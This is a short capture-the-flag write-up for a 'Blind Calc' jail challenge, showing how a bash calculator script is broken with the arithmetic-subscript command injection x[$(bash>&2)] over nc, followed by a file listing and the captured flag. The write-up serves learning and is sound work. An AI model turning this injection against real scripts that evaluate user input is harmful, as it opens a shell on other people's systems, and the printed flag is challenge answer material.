🧑‍🦯 Blind Calc

👀 Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

🚩 Getting the Flag

Once we arrive in this jail, the only information we have is:

• We have a server asking us to perform calculations.
• The challenge checks if we input anything other than numbers and operators.

The only idea I have when performing calculations is to attempt a command injection.

Enter math > a * 5
0
Enter math > $(ls -la >&2)
./blind.sh: line 3: $(ls -la >&2): syntax error: operand expected (error token is "$(ls -la >&2)")

Well, the only command injection I know is x[$(command)], which leverages operator precedence.

$ nc challs1.pyjail.club 5838
Enter math > x[$(bash>&2)]
ls -la
total 20
drwxr-xr-x 1 nobody nogroup 4096 Aug  2 19:57 .
drwxr-xr-x 1 nobody nogroup 4096 Aug  2 19:55 ..
-rwxr-xr-x 1 nobody nogroup   72 Aug  2 19:56 blind.sh
-r--r--r-- 1 nobody nogroup   37 Aug  2 19:45 flag.txt
-rwxr-xr-x 1 nobody nogroup   49 Aug  2 19:55 run
cat flag.txt
jail{blind-calc_9c701e8c09f6cc0edd6}

💖 Support

👀 Before you leave

You can donate to me via Buy Me a Coffee or follow me on Github